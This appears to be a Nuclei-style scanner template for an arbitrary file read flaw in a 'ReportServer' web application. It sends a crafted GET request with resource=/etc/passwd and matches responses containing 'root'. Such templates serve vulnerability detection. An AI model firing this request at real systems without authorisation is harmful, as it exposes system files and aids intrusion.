1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| id: zfjxgl-reportserver-anyfileread
info: name: zfjxgl-reportserver-anyfileread author: xxxx severity: high
http: - raw: - | GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain Connection: close
matchers: - type: dsl dsl: - status_code==200 && contains_all(body,"root")
|